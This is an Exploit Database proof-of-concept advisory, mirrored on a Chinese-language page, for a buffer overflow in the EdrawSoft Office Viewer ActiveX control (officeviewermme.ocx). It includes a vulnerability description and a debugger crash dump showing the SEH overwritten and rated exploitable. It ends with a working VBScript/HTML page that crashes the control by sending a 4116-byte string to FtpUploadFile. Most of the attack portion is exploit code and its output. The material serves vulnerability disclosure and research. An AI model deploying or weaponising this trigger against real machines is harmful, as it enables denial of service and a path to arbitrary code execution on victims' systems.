EdrawSoft Office Viewer Component ActiveX 5.6 – ‘officeviewermme.ocx’ Buffer Overflow (PoC)

• Exploit Database
• 9 阅读

• 作者： LiquidWorm
  日期： 2012-01-31
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18440/

• EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC
  
  
  Vendor: EdrawSoft
  Product web page: http://www.edrawsoft.com
  Affected version: 5.6.5781
  
  Summary: Edraw Office Viewer Component contains a standard ActiveX control
  that acts as an ActiveX document container for hosting Office documents
  (including Microsoft Word, Microsoft Excel, Microsoft PowerPoint, Microsoft
  Project, and Microsoft Visio documents) in a custom form or Web page. The
  control is lightweight and flexible, and gives developers new possibilities
  for using Office in a custom solution.
  
  Desc: The ActiveX suffers from a buffer overflow vulnerability when parsing
  large amount of bytes to the FtpUploadFile member in FtpUploadFile() function,
  resulting memory corruption overwriting severeal registers including the SEH.
  An attacker can gain access to the system of the affected node and execute
  arbitrary code.
  
  
  Tested on Microsoft Windows XP Professional SP3 (EN)
  
  
  -------------------------------------------------------------------------
  
  (6c9c.6c70): Access violation - code c0000005 (first chance)
  First chance exceptions are reported before any exception handling.
  This exception may be expected and handled.
  eax=00000041 ebx=00001015 ecx=000002a0 edx=001b2edc esi=0186e518 edi=01870000
  eip=220324cc esp=0186c488 ebp=0186c490 iopl=0 nv up ei pl nz na pe nc
  cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010206
  *** ERROR: Symbol file could not be found.Defaulted to export symbols for C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx - 
  officeviewermme!DllRegisterServer+0x23bbe:
  220324cc 668907mov word ptr [edi],axds:0023:01870000=????
  0:004> !exchain
  0186fa84: 00410041
  Invalid exception stack at 00410041
  0:004> d esi
  0186e51841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e52841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e53841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e54841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e55841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e56841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e57841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186e58841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0:004> d edx
  001b2edc41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2eec41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2efc41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2f0c41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2f1c41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2f2c41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2f3c41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  001b2f4c41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0:004> d esp+3000
  0186f48841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f49841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4a841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4b841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4c841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4d841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4e841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0186f4f841 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00A.A.A.A.A.A.A.A.
  0:004> !load msec; !exploitable
  Exploitability Classification: EXPLOITABLE
  Recommended Bug Title: Exploitable - User Mode Write AV starting at officeviewermme!DllRegisterServer+0x0000000000023bbe (Hash=0x55146322.0x550a2c22)
  
  User mode write access violations that are not near NULL are exploitable.
  
  -------------------------------------------------------------------------
  
  
  Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
  liquidworm gmail com
  Zero Science Lab - http://www.zeroscience.mk
  
  
  Advisory ID: ZSL-2012-5069
  Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5069.php
  
  Related ID: ZSL-2012-5068
  
  
  25.01.2012
  
  ---
  
  
  <object classid='clsid:F6FE8878-54D2-4333-B9F0-FC543B1BE1ED' id='ZSL' />
  <script language='vbscript'>
  
  targetFile = "C:\Program Files\Mindjet\MindManager 10\officeviewermme.ocx"
  prototype= "Function FtpUploadFile ( ByVal LocalFile As String ,ByVal RemoteFile As String ) As Boolean"
  memberName = "FtpUploadFile"
  progid = "OfficeViewer.OfficeViewer"
  argCount = 2
  
  arg1="defaultV"
  arg2=String(4116, "A")
  
  ZSL.FtpUploadFile arg1 ,arg2 
  
  </script>